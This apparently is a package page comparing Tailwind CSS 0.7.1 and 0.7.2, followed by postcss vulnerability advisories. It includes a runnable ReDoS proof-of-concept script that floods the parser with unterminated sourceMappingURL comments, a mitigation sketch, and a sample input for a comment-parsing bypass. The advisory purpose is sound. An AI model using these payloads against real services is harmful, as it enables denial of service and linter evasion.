Tailwind CSS saw a small version bump from 0.7.1 to 0.7.2 focused on internal improvements and bug fixes rather than on new user-facing features. Both versions share the same core dependencies, including PostCSS, Autoprefixer, and Lodash, so the foundation for utility-first CSS development is unchanged. The developer dependencies are also identical, reflecting the same tooling for code quality, testing, and linting (Jest, ESLint, and Prettier).
The difference lies in packaging and distribution. Version 0.7.2 has a slightly larger unpacked size (2112987 bytes) than 0.7.1 (2112595 bytes), which points to small modifications to the code or assets. The change is not drastic, but upgrading to 0.7.2 is recommended to pick up any bug fixes it carries. Both versions were released on the same day, indicating a quick follow-up to the previous release and a focus on stability for this iteration of the Tailwind CSS framework. Developers can continue to expect rapid UI development through a component-based approach thanks to the existing core dependencies.
All vulnerabilities related to version 0.7.2 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")

// Builds the payload: many unterminated "/*# sourceMappingURL=" openers
// followed by "!", so the annotation regex backtracks across all of them.
function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!";
}

// Warm-up parse of a well-formed annotation.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

// Grow the payload and time each parse; on vulnerable versions the time
// per parse grows super-linearly with the payload length.
for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
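As an added example (not PostCSS's own code and not part of the advisory), the following reads the same "/*# sourceMappingURL=... */" annotation with bounded string scans instead of the backtracking sub-pattern above, so the payload shape of build_attack() no longer causes super-linear work. The function names and the timing helper are this example's own assumptions.

```javascript
// Added example, not PostCSS's own code: a linear-time reader for the
// "/*# sourceMappingURL=<url> */" annotation that lib/previous-map.js looks
// for, using bounded lastIndexOf scans instead of the backtracking
// sub-pattern \/\*\s*# sourceMappingURL=(.*). Names are assumptions.

// Return the URL from the LAST complete annotation comment, or null.
function getAnnotationURL(css) {
  const marker = "sourceMappingURL=";
  let end = css.lastIndexOf("*/");
  while (end !== -1) {
    // Find the opener belonging to this closer. Comment boundaries are
    // located naively (no string-literal awareness), as the regex did.
    const start = css.lastIndexOf("/*", end);
    if (start === -1 || start + 2 > end) return null;
    const body = css.slice(start + 2, end).trimStart();
    if (body.startsWith("#")) {
      const rest = body.slice(1).trimStart();
      if (rest.startsWith(marker)) return rest.slice(marker.length).trim();
    }
    // Not an annotation: move to the previous closer. Each scan covers a
    // region strictly before the last one, so total work is O(css.length).
    end = css.lastIndexOf("*/", start - 1);
  }
  return null;
}

// Constructed input with the same shape as the page's build_attack():
// many unterminated "/*# sourceMappingURL=" openers and no closing "*/".
function buildAttack(n) {
  return "a{}" + "/*# sourceMappingURL=".repeat(n) + "!";
}

// Milliseconds spent extracting the annotation from buildAttack(n).
function timeAttack(n) {
  const t0 = Date.now();
  getAnnotationURL(buildAttack(n));
  return Date.now() - t0;
}

console.log(getAnnotationURL("a{}/*# sourceMappingURL=a.css.map */"));
for (const n of [1000, 100000, 500000]) {
  console.log("n=" + n + ": " + timeAttack(n) + " ms");
}
```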
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS so that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output as CSS nodes (rules, properties) despite originally sitting inside a comment.